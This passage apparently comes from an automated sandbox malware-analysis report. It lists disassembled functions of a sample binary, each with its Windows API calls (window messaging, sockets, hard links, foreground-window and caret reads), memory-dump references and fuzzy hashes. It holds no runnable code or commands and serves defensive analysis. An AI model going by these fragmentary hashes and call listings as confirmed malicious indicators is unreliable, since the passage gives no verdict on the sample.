                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                          • String ID:
                                                                                          • API String ID: 3240763771-0
                                                                                          • Opcode ID: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                                                          • Instruction ID: ec1a4dff6c5341ad57a53ba98b0f539b864df2cc4a0ba96fecd891c5d8a4160d
                                                                                          • Opcode Fuzzy Hash: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                                                          • Instruction Fuzzy Hash: 4841A571A00605ABDB249FA5C9445DFB7B6EFC1328F28852FE41997280D77CDEC18B48
                                                                                          Function 004781AE Relevance: 6.1, APIs: 4, Instructions: 135COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                          • VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                          • VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CopyVariant$ErrorLast
                                                                                          • String ID:
                                                                                          • API String ID: 2286883814-0
                                                                                          • Opcode ID: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                                                          • Instruction ID: 2d87100fc18953c9afe9b7e879878e48daa4ef19e0256d9a4550ae3fa38499cf
                                                                                          • Opcode Fuzzy Hash: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                                                          • Instruction Fuzzy Hash: 5F517C751543409FC310DF69C880A9BBBE4FF88314F448A6EF9499B352DB39E909CB99
                                                                                          Function 0047404B Relevance: 6.1, APIs: 4, Instructions: 133networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 00474068
                                                                                          • WSAGetLastError.WSOCK32(00000000,00000002,00000002,00000011), ref: 00474076
                                                                                          • #21.WSOCK32 ref: 004740E0
                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 004740EB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$socket
                                                                                          • String ID:
                                                                                          • API String ID: 1881357543-0
                                                                                          • Opcode ID: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
                                                                                          • Instruction ID: ff1742a21ceaee7448286ece46cbaad1fa76dded649dcd1b12ff87c083dae87e
                                                                                          • Opcode Fuzzy Hash: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
                                                                                          • Instruction Fuzzy Hash: 7641D9717403006AE720BF6ADC47F5672C89B54B18F14496EF648BF2C3D6FAA881869C
                                                                                          Function 00441CB4 Relevance: 6.1, APIs: 4, Instructions: 112windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                                          • GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                                          • PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                                          • MessageBeep.USER32(00000000), ref: 00441DF2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                                                          • String ID:
                                                                                          • API String ID: 1352109105-0
                                                                                          • Opcode ID: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                                          • Instruction ID: 11ad13a84751b34e4f8a983c71a6a29643224e7bbeba0240db3aabd8edeb2108
                                                                                          • Opcode Fuzzy Hash: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                                          • Instruction Fuzzy Hash: E64192B5A042418FE710DF18D884AABB7E5FFC9311F18866FE8518B360D734AC85CBA5
                                                                                          Function 0042384A Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042387E
                                                                                          • __isleadbyte_l.LIBCMT ref: 004238B2
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,00000002,?,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 004238E3
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,00000002,00000001,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 00423951
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                          • String ID:
                                                                                          • API String ID: 3058430110-0
                                                                                          • Opcode ID: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                                                                          • Instruction ID: 550681b3841f0f34ee613cb5364b25607849a03987ccfca5eaaec14299199b49
                                                                                          • Opcode Fuzzy Hash: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                                                                          • Instruction Fuzzy Hash: A931C270B00265EFDB20EF64D8849AA7BF5EF01312B9445AAF0A09F291D338CE81CB55
                                                                                          Function 0045D070 Relevance: 6.1, APIs: 4, Instructions: 100fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D10A
                                                                                          • GetLastError.KERNEL32(?,00000000), ref: 0045D12B
                                                                                          • DeleteFileW.KERNEL32(00000000,?), ref: 0045D14C
                                                                                          • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0045D16A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                          • String ID:
                                                                                          • API String ID: 3321077145-0
                                                                                          • Opcode ID: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                                          • Instruction ID: 240381fd0e223f31e6bb83dc4f900fe278965bce5f9bbaa9f824fb1079ab41c9
                                                                                          • Opcode Fuzzy Hash: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                                          • Instruction Fuzzy Hash: 393180B5900301ABCB10AF71C985A1BF7E8AF84755F10891EF85497392C739FC45CB68
                                                                                          Function 0045058D Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetParent.USER32(?), ref: 004505BF
                                                                                          • DefDlgProcW.USER32(?,00000138,?,?,004A83D8,?,004A83D8,?), ref: 00450610
                                                                                          • DefDlgProcW.USER32(?,00000133,?,?,004A83D8,?,004A83D8,?), ref: 0045065A
                                                                                          • DefDlgProcW.USER32(?,00000134,?,?,004A83D8,?,004A83D8,?), ref: 00450688
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Proc$Parent
                                                                                          • String ID:
                                                                                          • API String ID: 2351499541-0
                                                                                          • Opcode ID: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                                          • Instruction ID: e3e31f905615dd8bfbe674c7a91f48f64006a8638b4dc9b760805e547d05c650
                                                                                          • Opcode Fuzzy Hash: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                                          • Instruction Fuzzy Hash: 8C3128362411006BC2209B299C58DBB7B58EBC7336F14465BFA54832D3CB769826C768
                                                                                          Function 004613E0 Relevance: 6.1, APIs: 4, Instructions: 90windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00438C85: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00438C95
                                                                                            • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                          • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 00461420
                                                                                          • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 0046144F
                                                                                          • __itow.LIBCMT ref: 00461461
                                                                                          • __itow.LIBCMT ref: 004614AB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$__itow$_wcslen
                                                                                          • String ID:
                                                                                          • API String ID: 2875217250-0
                                                                                          • Opcode ID: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                                                          • Instruction ID: b65c482f8247f617b799fd724a7506577ebf884cdb52d0d4602b18db992df379
                                                                                          • Opcode Fuzzy Hash: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                                                          • Instruction Fuzzy Hash: 3A213D7670031067D210BA169C86FAFB794EB94714F08443FFF44AB241EE69E94687EB
                                                                                          Function 004727F8 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetForegroundWindow.USER32 ref: 00472806
                                                                                            • Part of subcall function 00443EEF: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 00443F11
                                                                                            • Part of subcall function 00443EEF: GetCurrentThreadId.KERNEL32 ref: 00443F18
                                                                                            • Part of subcall function 00443EEF: AttachThreadInput.USER32(00000000), ref: 00443F1F
                                                                                          • GetCaretPos.USER32(?), ref: 0047281A
                                                                                          • ClientToScreen.USER32(00000000,?), ref: 00472856
                                                                                          • GetForegroundWindow.USER32 ref: 0047285C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                          • String ID:
                                                                                          • API String ID: 2759813231-0
                                                                                          • Opcode ID: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                                                                          • Instruction ID: 38f02bd9b1f6bed34cfa7ce2d7f69328ba3456287a0ba45db7850a86b8391dd2
                                                                                          • Opcode Fuzzy Hash: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                                                                          • Instruction Fuzzy Hash: FF2195716403056FE310EF65CC42F5BB7E8AF84708F144D2EF544AB282D6FAB9858795
                                                                                          Function 0047721A Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0047728E
                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772A9
                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772C0
                                                                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001,?,?), ref: 004772D0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Long$AttributesLayered
                                                                                          • String ID:
                                                                                          • API String ID: 2169480361-0
                                                                                          • Opcode ID: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                                          • Instruction ID: faea1ea985e506ac999786301d765d91882fdca708237d94abe4bce3661c65f1
                                                                                          • Opcode Fuzzy Hash: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                                          • Instruction Fuzzy Hash: 5F11B431205510ABD310FB29DD45F9BB798FF91720F10862EF455E72E2C7A8AC45C7A8
                                                                                          Function 00448C8B Relevance: 6.1, APIs: 4, Instructions: 73windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageW.USER32 ref: 00448CB8
                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 00448CE0
                                                                                          • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448D19
                                                                                          • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D62
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$LongWindow
                                                                                          • String ID:
                                                                                          • API String ID: 312131281-0
                                                                                          • Opcode ID: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                                          • Instruction ID: 9d6bf2a2f0cb0d5184a29e15ea511504db1ac53b4253ca88fa0f688086887250
                                                                                          • Opcode Fuzzy Hash: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                                          • Instruction Fuzzy Hash: B12174715053019BF3208F18D98879FB7E4FBD5325F140B2EF594962D0DBB58449C796
                                                                                          Function 004588B0 Relevance: 6.1, APIs: 4, Instructions: 67networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • select.WSOCK32 ref: 0045890A
                                                                                          • __WSAFDIsSet.WSOCK32(00000000,00000000), ref: 00458919
                                                                                          • accept.WSOCK32(00000000,00000000,00000000,00000000,00000000), ref: 00458927
                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00458952
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLastacceptselect
                                                                                          • String ID:
                                                                                          • API String ID: 385091864-0
                                                                                          • Opcode ID: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                                                                                          • Instruction ID: 93f38c3b8a65fd8a68e5265ae944391143789c71a4918893f245a539b4228a7d
                                                                                          • Opcode Fuzzy Hash: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                                                                                          • Instruction Fuzzy Hash: 1F2166712043019BD314EF29C842BABB7E5AFC4714F144A2EF994DB2C1DBB4A985CB99
                                                                                          Function 00438D4E Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00438D6F
                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D82
                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D9A
                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438DB4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend
                                                                                          • String ID:
                                                                                          • API String ID: 3850602802-0
                                                                                          • Opcode ID: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                                          • Instruction ID: 707762f1bc06eebb59e9357f9c77b20c0e090dcf7cedc03b298b4f863176c0ea
                                                                                          • Opcode Fuzzy Hash: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                                          • Instruction Fuzzy Hash: 77113AB6204305AFD210EF58DC84F6BF7E8EBE8750F20491EF580D7290D6B1A8468BA1
                                                                                          Function 0043362D Relevance: 6.1, APIs: 4, Instructions: 54windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateWindowExW.USER32(?,?,?,FFFFFFFF,?,?,?,?,?,?,00400000,00000000), ref: 0043367E
                                                                                          • GetStockObject.GDI32(00000011), ref: 00433695
                                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 0043369F
                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 004336BA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$CreateMessageObjectSendShowStock
                                                                                          • String ID:
                                                                                          • API String ID: 1358664141-0
                                                                                          • Opcode ID: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                                          • Instruction ID: 5bb77caae3378c1c36de35f78993aeb7f53e4fc0e9047450929301c31466c70f
                                                                                          • Opcode Fuzzy Hash: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                                          • Instruction Fuzzy Hash: 60114F72204A00BFD254DF55CC49F5BB3F9AFCCB01F20950DB254922A0D7B4E9418BA9
                                                                                          Function 0044419B Relevance: 6.1, APIs: 4, Instructions: 53synchronizationthreadwindowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 004441B8
                                                                                          • MessageBoxW.USER32(?,?,?,?), ref: 004441F6
                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0044420C
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00444213
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                          • String ID:
                                                                                          • API String ID: 2880819207-0
                                                                                          • Opcode ID: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                                          • Instruction ID: a177bb78e812b0c83f085b16f259857c8a511f23e32e5024349264f8b0df3d09
                                                                                          • Opcode Fuzzy Hash: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                                          • Instruction Fuzzy Hash: C401E5364183105BD300DB28ED08A9BBBD8BFD9721F18067EF89893351E6B48948C7B6
                                                                                          Function 0043401C Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetWindowRect.USER32(?,?), ref: 00434037
                                                                                          • ScreenToClient.USER32(?,?), ref: 0043405B
                                                                                          • ScreenToClient.USER32(?,?), ref: 00434085
                                                                                          • InvalidateRect.USER32(?,?,?), ref: 004340A4
                                                                                          Memory Dump Source
